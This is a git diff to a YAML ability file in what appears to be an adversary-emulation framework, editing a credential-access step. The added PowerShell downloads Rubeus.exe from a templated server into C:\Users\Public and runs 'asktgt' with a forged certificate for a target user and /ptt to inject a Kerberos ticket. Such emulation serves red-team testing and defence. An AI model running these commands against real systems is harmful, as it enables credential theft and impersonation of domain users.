--- a/plugins/adversary_emulation/data/abilities/credential-access/ae1831b1-b435-4864-ae7f-rubeus-asktgt.yml
+++ b/plugins/adversary_emulation/data/abilities/credential-access/ae1831b1-b435-4864-ae7f-rubeus-asktgt.yml
@@ -11,9 +11,9 @@
   platforms:
     windows:
       psh:
-        payloads:
-          - Rubeus.exe
         command: |
+          cd "C:\Users\Public";
+          Invoke-WebRequest -Uri "#{server}/file/download" -Method POST -Headers @{"file" = "Rubeus.exe"} -OutFile "Rubeus.exe";
           .\Rubeus.exe asktgt /user:#{esc1.target_user} /certificate:"CN=#{esc1.target_user}" /ptt
           klist | findstr.exe "#{esc1.target_user}";
           if ($LASTEXITCODE -eq 0) {
